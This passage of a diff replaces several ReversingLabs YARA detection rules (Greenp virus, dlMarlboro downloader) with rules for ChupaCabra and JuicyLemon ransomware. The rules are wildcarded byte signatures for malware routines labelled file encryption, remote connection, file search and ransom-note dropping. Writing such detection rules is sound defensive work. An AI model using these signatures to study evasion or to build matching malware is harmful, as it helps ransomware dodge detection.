+            ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? BE ?? ?? ?? ?? 8D 7D ?? A5 68 ?? ?? ??
+            ?? 6A ?? 66 A5 E8 ?? ?? ?? ?? 83 C4 ?? 53 FF D0 6A ?? FF 75 ?? A3 ?? ?? ?? ?? FF 55
+            ?? 6A ?? FF 75 ?? 8B F0 FF 55 ?? FF 75 ?? 89 45 ?? 53 E8 ?? ?? ?? ?? 8D 45 ?? 50 FF
+        }
+		$encrypt_files_4 = {
+            35 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 66 85 C0 75 ?? 33 C0 40 E9 ?? ?? ?? ?? 8B 3D
+            ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 59 59 8B C8 8B 45 ?? 53 57 99 53 53
+            2B C2 68 ?? ?? ?? ?? D1 F8 2D ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 8B C6 99 2B C2 D1 F8 2D
+            ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 45 ?? 50 53 FF D1 A3 ?? ?? ?? ?? E8
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 59 59 68 ?? ?? ?? ??
+            8D 8D ?? ?? ?? ?? 51 FF D0 E8 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 68
+            ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 FF D0
+            BE ?? ?? ?? ?? 85 C0 75 ?? 56 6A ?? E8 ?? ?? ?? ?? 59 59 53 53 53 68 ?? ?? ?? ?? 53
+            53 FF D0 56 6A ?? E8 ?? ?? ?? ?? 59 59 53 53 53 68 ?? ?? ?? ?? 53 53 FF D0 39 1D ??
+            ?? ?? ?? 75 ?? 6A ?? 58 EB ?? 6A ?? 59 33 C0 68 ?? ?? ?? ?? 89 5D ?? 8D 7D ?? 6A ??
+            F3 AB E8 ?? ?? ?? ?? 59 59 6A ?? FF D0 EB ?? 83 F8 ?? 74 ?? 68 ?? ?? ?? ?? 6A ?? E8
+            ?? ?? ?? ?? 59 59 8D 4D ?? 51 FF D0 68 ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 59 59 8D 4D
+            ?? 51 FF D0 6A ?? 59 8D 75 ?? BF ?? ?? ?? ?? F3 A5 68 ?? ?? ?? ?? 6A ?? E8 ?? ?? ??
+            ?? 59 59 53 53 53 8D 4D ?? 51 FF D0 3B C3 75 ?? 8B 45 ?? 5F 5E 5B C9 C2 ?? ?? 6A ??
+            E9
+        }
+		$remote_connection_4 = {
+            55 8B EC 51 51 53 56 68 ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 59 59 33 F6 56 56 56 6A ??
+            68 ?? ?? ?? ?? FF D0 68 ?? ?? ?? ?? 6A ?? 8B D8 E8 ?? ?? ?? ?? 59 59 56 56 6A ?? 56
+            56 6A ?? FF 75 ?? 53 FF D0 68 ?? ?? ?? ?? 6A ?? 89 45 ?? E8 ?? ?? ?? ?? 59 59 56 68
+            ?? ?? ?? ?? 56 56 68 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? FF 75 ?? FF D0 68 ?? ?? ??
+            ?? 6A ?? 89 45 ?? E8 ?? ?? ?? ?? 59 59 56 56 56 56 FF 75 ?? FF D0 53 E8 ?? ?? ?? ??
+            FF 75 ?? E8 ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 5E 5B C9 C3
+        }
+		$remote_connection_5 = {
+            55 8B EC 81 EC ?? ?? ?? ?? 53 56 57 33 FF 68 ?? ?? ?? ?? 47 57 E8 ?? ?? ?? ?? 59 59
+            68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 FF D0 FF 75 ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ??
+            ?? BE ?? ?? ?? ?? 56 57 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51
+            FF D0 56 57 E8 ?? ?? ?? ?? 59 59 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 FF D0 56 57 E8
+            ?? ?? ?? ?? 59 59 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 FF D0 68 ?? ?? ?? ?? 6A ?? E8
+            ?? ?? ?? ?? 59 59 8D 8D ?? ?? ?? ?? 51 6A ?? FF D0 BE ?? ?? ?? ?? 85 C0 74 ?? 56 57
+            E8 ?? ?? ?? ?? 59 59 6A ?? FF D0 68 ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 59 59 6A ?? 57
+            6A ?? FF D0 8B D8 85 DB 7D ?? 56 57 E8 ?? ?? ?? ?? 59 59 6A ?? FF D0 68 ?? ?? ?? ??
+            E8 ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? 6A ?? 8B F0 E8 ?? ?? ?? ?? 59 59 6A ?? 8D 4D ??
+            51 FF D0 6A ?? 58 66 89 45 ?? 8B 46 ?? 8B 00 8B 00 6A ?? 89 45 ?? E8 ?? ?? ?? ?? 66
+            89 45 ?? 6A ?? 8D 45 ?? 50 53 E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 83 C4
+            ?? 8D 8D ?? ?? ?? ?? 51 FF D0 6A ?? 50 8D 85 ?? ?? ?? ?? 50 53 E8 ?? ?? ?? ?? 53 E8
+            ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 83 C4 ?? FF D0 5F 5E 5B C9 C3
         }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( ( ( $deadcode_ep_1 at pe.entry_point ) and ( $deadcode_marker at 0x40 ) ) or ( ( $deadcode_ep_2 at pe.entry_point ) and ( $deadcode_marker at 0x40 ) ) or ( ( $deadcode_ep_3 at pe.entry_point ) and ( $deadcode_marker at 0x40 ) ) or ( $deadcode_body_1 and $deadcode_body_2 ) )
+		uint16( 0 ) == 0x5A4D and ( ( $encrypt_files_1 and $remote_connection_1 and $remote_connection_2 and $remote_connection_3 ) or ( $encrypt_files_2 and $encrypt_files_3 and $encrypt_files_4 and $remote_connection_4 and $remote_connection_5 ) )
 }
-
-rule REVERSINGLABS_Win32_Virus_Greenp : TC_DETECTION MALICIOUS MALWARE FILE
+rule REVERSINGLABS_Bytecode_MSIL_Ransomware_Chupacabra : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Yara rule that detects Greenp virus."
+		description = "Yara rule that detects ChupaCabra ransomware."
 		author = "ReversingLabs"
-		id = "5751e91c-652b-59bd-93b8-ece677ad4911"
-		date = "2020-06-26"
-		modified = "2020-07-15"
+		id = "e44a101d-53c3-51f2-84ca-f6a5858c169b"
+		date = "2021-10-12"
+		modified = "2021-10-12"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/virus/Win32.Virus.Greenp.yara#L3-L46"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/ByteCode.MSIL.Ransomware.ChupaCabra.yara#L1-L90"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "ca6df34ee2ad9d93e35b0d1a2d4765f681f3981ffe2786bbc822c3090212fd02"
+		logic_hash = "7f247778e0bd8057670abf42b2d1011ebae891ffcb21ebad50060f9a7986bf93"
 		score = 75
 		quality = 90
 		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
 		category = "MALWARE"
-		tc_detection_type = "Virus"
-		tc_detection_name = "Greenp"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "ChupaCabra"
 		tc_detection_factor = 5
 		importance = 25
 
 	strings:
-		$greenp_body_1 = {
-            68 ?? ?? ?? ?? 60 FC E8 4E 05 00 00 E8 31 04 00 00 0F 82 93 00 00 00 80 BD ?? ?? ?? ?? 01 75 63 FF 95 ?? ?? ?? ?? 6A 01
-            50 FF 95 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 6A 00 6A 00 FF 95 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 EC 18 8B FC
-            6A 00 6A 00 6A 00 57 FF 95 ?? ?? ?? ?? 85 C0 74 10 57 FF 95 ?? ?? ?? ?? 57 FF 95 ?? ?? ?? ?? EB DF 68 ?? ?? ?? ?? 6A 00
-            FF 95 ?? ?? ?? ?? 83 C4 18 EB 27 8D 85 ?? ?? ?? ?? 50 FF 95 ?? ?? ?? ?? 85 C0 75 16 8D 85 ?? ?? ?? ?? 50 FF 95 ?? ?? ??
-            ?? 85 C0 74 05 E8 81 00 00 00 61 58 FF E0 ?? E8 04 00 00 00 [4] 8B 3C 24 81 EC 00 01 00 00 8B F4 56 68 00 01 00 00 FF
-            95 ?? ?? ?? ?? AC AA 81 C4 00 01 00 00 FF 95 ?? ?? ?? ?? 83 F8 03 75 2D 83 EC 10 8B F4 56 8D 46 04 50 8D 46 08 50 8D 46
-            0C 50 4F 57 FF 95 ?? ?? ?? ?? 8B 46 04 2B D2 F7 66 08 F7 66 0C 83 C4 10 3D 00 00 40 06 C3 [27] 81 EC ?? ?? ?? ?? 8B F4
-            68 ?? ?? ?? ?? 56 FF 95 ?? ?? ?? ?? 8D BD ?? ?? ?? ?? 8A 17 88 14 06 40 47 80 FA 00 75 F4 68 ?? ?? ?? ?? 6A 00 FF 95 ??
-            ?? ?? ?? 97 56 57 B9 ?? ?? ?? ?? 8D B5 ?? ?? ?? ?? E8 3A 02 00 00 5F B8 ?? ?? ?? ?? 99 68 ?? ?? ?? ?? 59 F7 F1 40 F7 E1
-            8B 57 3C 03 D7 0F B7 5A 14 8D 5C 13 40 8B 72 28 03 72 34 89 B5 ?? ?? ?? ?? C7 42 10 80 67 D5 40 FF 73 10 01 43 10 8B 43
-            10 05 ?? ?? ?? ?? 89 43 08 58 03 43 0C 89 42 28 52 B8 ?? ?? ?? ?? 99 68 ?? ?? ?? ?? 59 F7 F1 40 F7 E1 5A 01 43 10 01 42
-            50 81 42 50 ?? ?? ?? ?? 57 C6 85 ?? ?? ?? ?? 01 81 C7 ?? ?? ?? ?? 8D B5 ?? ?? ?? ?? B9 ?? ?? ?? ?? FC F3 A4 C6 85 ?? ??
-            ?? ?? 00 5F 5E 6A 00 6A 00 6A 02 6A 00 6A 00 68 00 00 00 C0 56 FF 95 ?? ?? ?? ?? 93 50 8B C4 6A 00 50 B8 ?? ?? ?? ?? 99
+		$encrypt_files_p1 = {
+            7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 2C ?? 72 ?? ?? ?? ?? 73 ?? ?? ?? ?? 7A 7E ?? ?? ?? ?? 28
+            ?? ?? ?? ?? 2C ?? 72 ?? ?? ?? ?? 73 ?? ?? ?? ?? 7A 14 0A 14 0B 7E ?? ?? ?? ?? 7E ?? ??
+            ?? ?? 73 ?? ?? ?? ?? 0C 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 0D 09 73 ?? ?? ?? ?? 13 ?? 73 ??
+            ?? ?? ?? 0A 06 08 06 6F ?? ?? ?? ?? 1E 5B 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 06 11 ?? 28 ??
+            ?? ?? ?? 6F ?? ?? ?? ?? 06 06 6F ?? ?? ?? ?? 06 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 11
+            ?? 11 ?? 16 73 ?? ?? ?? ?? 13 ?? 11 ?? 73 ?? ?? ?? ?? 13 ?? 11 ?? 6F ?? ?? ?? ?? 0B DE
+            ?? 11 ?? 2C ?? 11 ?? 6F ?? ?? ?? ?? DC 11 ?? 2C ?? 11 ?? 6F ?? ?? ?? ?? DC 11 ?? 2C ??
+            11 ?? 6F ?? ?? ?? ?? DC 06 2C ?? 06 6F ?? ?? ?? ?? DC 07 2A
         }
-		$greenp_body_2 = {
-            68 ?? ?? ?? ?? 59 F7 F1 40 F7 E1 50 57 53 FF 95 ?? ?? ?? ?? 58 57 FF 95 ?? ?? ?? ?? 53 FF 95 ?? ?? ?? ?? 6A 00 56 FF 95
-            ?? ?? ?? ?? 50 50 8B FC 8D 57 04 2B C0 52 57 50 68 3F 00 0F 00 50 50 50 8D 85 ?? ?? ?? ?? 50 68 02 00 00 80 FF 95 ?? ??
-            ?? ?? 85 C0 75 1E 6A 0C 56 6A 01 6A 00 8D 85 ?? ?? ?? ?? 50 FF 37 FF 95 ?? ?? ?? ?? FF 37 FF 95 ?? ?? ?? ?? 81 C4 ?? ??
-            ?? ?? C3
+		$encrypt_files_p2 = {
+            02 73 ?? ?? ?? ?? 28 ?? ?? ?? ?? 20 ?? ?? ?? ?? 6A 30 ?? 02 28 ?? ?? ?? ?? 28 ?? ?? ??
+            ?? 0A 02 06 28 ?? ?? ?? ?? 02 02 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 38 ?? ??
+            ?? ?? 02 73 ?? ?? ?? ?? 28 ?? ?? ?? ?? 20 ?? ?? ?? ?? 6A 30 ?? 20 ?? ?? ?? ?? 8D ?? ??
+            ?? ?? 0B 02 19 28 ?? ?? ?? ?? 73 ?? ?? ?? ?? 0C 08 20 ?? ?? ?? ?? 6F ?? ?? ?? ?? 28 ??
+            ?? ?? ?? 0D 09 07 09 8E 69 28 ?? ?? ?? ?? DE ?? 08 2C ?? 08 6F ?? ?? ?? ?? DC 02 19 28
+            ?? ?? ?? ?? 73 ?? ?? ?? ?? 13 ?? 11 ?? 07 6F ?? ?? ?? ?? DE ?? 11 ?? 2C ?? 11 ?? 6F ??
+            ?? ?? ?? DC 02 02 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? DD ?? ?? ?? ?? 26 02 28
+            ?? ?? ?? ?? 13 ?? 11 ?? 17 5F 17 33 ?? 11 ?? 17 28 ?? ?? ?? ?? 13 ?? 02 11 ?? 28 ?? ??
+            ?? ?? 02 73 ?? ?? ?? ?? 28 ?? ?? ?? ?? 20 ?? ?? ?? ?? 6A 30 ?? 02 28 ?? ?? ?? ?? 28 ??
+            ?? ?? ?? 13 ?? 02 11 ?? 28 ?? ?? ?? ?? 02 02 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ??
+            ?? 38 ?? ?? ?? ?? 02 73 ?? ?? ?? ?? 28 ?? ?? ?? ?? 20 ?? ?? ?? ?? 6A 30 ?? 20 ?? ?? ??
+            ?? 8D ?? ?? ?? ?? 13 ?? 02 19 28 ?? ?? ?? ?? 73 ?? ?? ?? ?? 13 ?? 11 ?? 20 ?? ?? ?? ??
+            6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 13 ?? DE ?? 11 ?? 2C ?? 11 ?? 6F ?? ?? ?? ?? DC 02 19 28
+            ?? ?? ?? ?? 73 ?? ?? ?? ?? 13 ?? 11 ?? 11 ?? 6F ?? ?? ?? ?? DE ?? 11 ?? 2C ?? 11 ?? 6F
+            ?? ?? ?? ?? DC 02 02 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? DE ?? DE ?? 26 DE ??
+            2A
+        }
+		$find_files_p1 = {
+            02 28 ?? ?? ?? ?? 0A 02 28 ?? ?? ?? ?? 0B 16 0C 2B ?? 06 08 9A 28 ?? ?? ?? ?? 72 ?? ??
+            ?? ?? 6F ?? ?? ?? ?? 2D ?? 06 08 9A 28 ?? ?? ?? ?? 08 17 58 0C 08 06 8E 69 32 ?? 16 0D
+            2B ?? 07 09 9A 28 ?? ?? ?? ?? 09 17 58 0D 09 07 8E 69 32 ?? DE ?? 26 DE ?? 2A
+        }
+		$find_files_p2 = {
+            72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 3A ?? ?? ??
+            ?? 1F ?? 8D ?? ?? ?? ?? 25 16 1E 28 ?? ?? ?? ?? A2 25 17 1F ?? 28 ?? ?? ?? ?? A2 25 18
+            1F ?? 28 ?? ?? ?? ?? A2 25 19 1F ?? 28 ?? ?? ?? ?? A2 25 1A 1F ?? 28 ?? ?? ?? ?? A2 25
+            1B 1B 28 ?? ?? ?? ?? A2 25 1C 1C 28 ?? ?? ?? ?? A2 25 1D 1F ?? 28 ?? ?? ?? ?? A2 25 1E
+            1F ?? 28 ?? ?? ?? ?? A2 25 1F ?? 1F ?? 28 ?? ?? ?? ?? A2 25 1F ?? 1F ?? 28 ?? ?? ?? ??
+            A2 25 1F ?? 1F ?? 28 ?? ?? ?? ?? A2 25 1F ?? 1F ?? 28 ?? ?? ?? ?? A2 25 1F ?? 1B 28 ??
+            ?? ?? ?? A2 25 1F ?? 1F ?? 28 ?? ?? ?? ?? A2 25 1F ?? 1F ?? 28 ?? ?? ?? ?? A2 25 1F ??
+            1F ?? 28 ?? ?? ?? ?? A2 25 1F ?? 1F ?? 28 ?? ?? ?? ?? A2 25 1F ?? 1F ?? 28 ?? ?? ?? ??
+            A2 0A 16 0B 2B ?? 06 07 9A 28 ?? ?? ?? ?? 07 17 58 0B 07 06 8E 69 32 ?? 2A
+        }
+		$drop_ransom_note = {
+            7E ?? ?? ?? ?? 2C ?? 28 ?? ?? ?? ?? 7E ?? ?? ?? ?? 39 ?? ?? ?? ?? 20 ?? ?? ?? ?? 28 ??
+            ?? ?? ?? 28 ?? ?? ?? ?? 1F ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 1B 8D ?? ??
+            ?? ?? 25 16 72 ?? ?? ?? ?? A2 25 17 7E ?? ?? ?? ?? A2 25 18 72 ?? ?? ?? ?? A2 25 19 7E
+            ?? ?? ?? ?? A2 25 1A 72 ?? ?? ?? ?? A2 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 20
+            ?? ?? ?? ?? 28 ?? ?? ?? ?? 1B 8D ?? ?? ?? ?? 25 16 72 ?? ?? ?? ?? A2 25 17 7E ?? ?? ??
+            ?? A2 25 18 72 ?? ?? ?? ?? A2 25 19 7E ?? ?? ?? ?? A2 25 1A 72 ?? ?? ?? ?? A2 28 ?? ??
+            ?? ?? 28 ?? ?? ?? ?? 26 1F ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ??
+            ?? 26 73 ?? ?? ?? ?? 0A 7E ?? ?? ?? ?? 0B 06 07 6F ?? ?? ?? ?? 26 2A
         }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $greenp_body_1 at pe.entry_point ) and $greenp_body_2
+		uint16( 0 ) == 0x5A4D and ( all of ( $find_files_p* ) ) and ( all of ( $encrypt_files_p* ) ) and ( $drop_ransom_note )
 }
-rule REVERSINGLABS_Win32_Downloader_Dlmarlboro : TC_DETECTION MALICIOUS MALWARE FILE
+rule REVERSINGLABS_Win32_Ransomware_Juicylemon : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Yara rule that detects dlMarlboro downloader."
+		description = "Yara rule that detects JuicyLemon ransomware."
 		author = "ReversingLabs"
-		id = "4c99b5a4-dc6b-579b-b1bd-bd4c93c6e68c"
-		date = "2020-07-23"
-		modified = "2020-07-23"
+		id = "35e4bbd6-422b-562e-98fc-fe932270dbb8"
+		date = "2020-08-17"
+		modified = "2020-08-17"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/downloader/Win32.Downloader.dlMarlboro.yara#L1-L79"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.JuicyLemon.yara#L1-L116"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "465a3b3a9686889001ac0b929d0349e44b6015eaeed3386361366def5013164a"
+		logic_hash = "596d89843793307f4940dbb85b2e7081f02250f6adfdcd01f2d3c5f2b8b90875"
 		score = 75
 		quality = 90
 		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
 		category = "MALWARE"
-		tc_detection_type = "Downloader"
-		tc_detection_name = "dlMarlboro"
-		tc_detection_factor = 3
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "JuicyLemon"
+		tc_detection_factor = 5
 		importance = 25
 
 	strings:
-		$ping_apnic = {
-            55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 6A ?? 8D 85 ?? ?? ?? ?? C7
-            85 ?? ?? ?? ?? ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 0F 57
-            C0 F3 0F 7F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 6A ?? FF 15 ?? ?? ?? ?? 8D 85 ?? ?? ??
-            ?? 50 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D
-            85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 6A ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ??
-            8D 85 ?? ?? ?? ?? 50 6A ?? FF 15 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? FF
-            B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3
+		$remote_connection_1 = {
+            55 8B EC 83 C4 ?? 53 56 57 89 4D ?? 8B FA 8B F0 C6 45 ?? ?? 6A ?? 6A ?? 6A ?? 6A ??
+            6A ?? FF 15 ?? ?? ?? ?? 8B D8 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 57 56 53 FF 15 ?? ?? ??
+            ?? 8B F0 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 8B 45 ?? 50 68 ?? ?? ?? ?? 56 FF 15
+            ?? ?? ?? ?? 8B F8 8B 45 ?? E8 ?? ?? ?? ?? 50 8B 45 ?? 50 6A ?? 68 ?? ?? ?? ?? 57 FF
+            15 ?? ?? ?? ?? 85 C0 74 ?? C6 45 ?? ?? 57 FF 15 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 53
+            FF 15 ?? ?? ?? ?? 8A 45 ?? 5F 5E 5B 59 59 5D C2
         }
-		$download_bin_1 = {
-            55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ??
-            33 C5 89 45 ?? 53 56 57 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 89 65 ?? 8B F2 8B C1 89 85 ??
-            ?? ?? ?? 8B 7D ?? 68 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 6A ?? C7 85 ??
-            ?? ?? ?? ?? ?? ?? ?? 50 C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 68 ?? ??
-            ?? ?? 83 EC ?? 8B CC 6A ?? 6A ?? C7 41 ?? ?? ?? ?? ?? C7 41 ?? ?? ?? ?? ?? 56 C6 01
-            ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 51 8D 8D ?? ?? ?? ?? C6 45 ?? ??
-            E8 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 40 ?? F6 84
-            05 ?? ?? ?? ?? ?? 74 ?? 8B 85 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? FF 50 ?? 8D 4D ?? 51 8B
-            C8 E8 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ??
-            ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? BA ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 8B D7 8B C8 E8 ?? ?? ?? ?? BA ?? ?? ?? ?? 8B C8 E8 ?? ?? ?? ?? BA ?? ?? ?? ??
-            8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B D6 8B C8 E8 ?? ?? ?? ?? BA ?? ?? ?? ?? 8B C8 E8
-            ?? ?? ?? ?? BA ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? BA ?? ?? ?? ?? 8D 8D ??
-            ?? ?? ?? E8 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? 8D 55
-            ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 8D ?? ?? ??
-            ?? E8 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? 8D 55 ?? C6
-            45 ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 40 ?? F6 84 05 ?? ??
-            ?? ?? ?? 74 ?? 83 EC ?? 8D 45 ?? 8D 4D ?? 50 E8 ?? ?? ?? ?? C6 45 ?? ?? BA ?? ?? ??
-            ?? 8B C8 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 84 C0 74 ?? B3 ?? EB ?? 32 DB
+		$remote_connection_2 = {
+            55 8B EC 33 C9 51 51 51 51 51 51 51 53 56 89 55 ?? 89 45 ?? 8B 45 ?? E8 ?? ?? ?? ??
+            8B 45 ?? E8 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 33 DB 8D 55 ?? 8B
+            45 ?? E8 ?? ?? ?? ?? 8D 55 ?? 8B 45 ?? E8 ?? ?? ?? ?? 8D 55 ?? 8B 45 ?? E8 ?? ?? ??
+            ?? 66 BE ?? ?? 8B 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 75 ?? 66 BE ?? ?? 8D 45 ?? E8
+            ?? ?? ?? ?? 50 8D 45 ?? B9 ?? ?? ?? ?? 8B 55 ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ??
+            ?? 50 8D 45 ?? B9 ?? ?? ?? ?? 8B 55 ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B D6
+            59 E8 ?? ?? ?? ?? 84 C0 74 ?? B3 ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8D 45 ??
+            BA ?? ?? ?? ?? E8 ?? ?? ?? ?? C3
         }
-		$download_bin_2 = {
-            C7 45 ?? ?? ?? ?? ?? F6 85 ?? ?? ?? ?? ?? 74 ?? 83 7D ?? ?? 72 ?? FF 75 ?? E8 ?? ??
-            ?? ?? 83 C4 ?? 84 DB 74 ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ??
-            ?? ?? 50 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 3D ?? ?? ?? ?? 74 ?? 8D 80 ?? ?? ?? ?? 89
-            85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? C7 45 ?? ?? ?? ??
-            ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? 8B 85 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 8B 40 ?? 03
-            C8 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 50 C6 45 ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 83
-            C4 ?? 8B 8D ?? ?? ?? ?? 8B F0 85 C9 74 ?? 8B 01 FF 50 ?? 85 C0 74 ?? 8B 10 8B C8 6A
-            ?? FF 12 8B 06 8B CE 6A ?? 8B 40 ?? FF D0 50 8D 55 ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ??
-            ?? 8B 5D ?? 83 C4 ?? 8B 7D ?? 8B 08 8B 49 ?? F6 44 01 ?? ?? 75 ?? 8B 75 ?? 8D 4D ??
-            83 FB ?? B8 ?? ?? ?? ?? BA ?? ?? ?? ?? 0F 43 CF 3B F0 0F 42 C6 50 E8 ?? ?? ?? ?? 83
-            C4 ?? 85 C0 75 ?? 83 FE ?? 73 ?? 83 C8 ?? EB ?? 33 C0 83 FE ?? 0F 95 C0 85 C0 0F 94
-            C0 84 C0 0F 94 C0 84 C0 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 6A ?? 50
-            E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? C6 45 ??
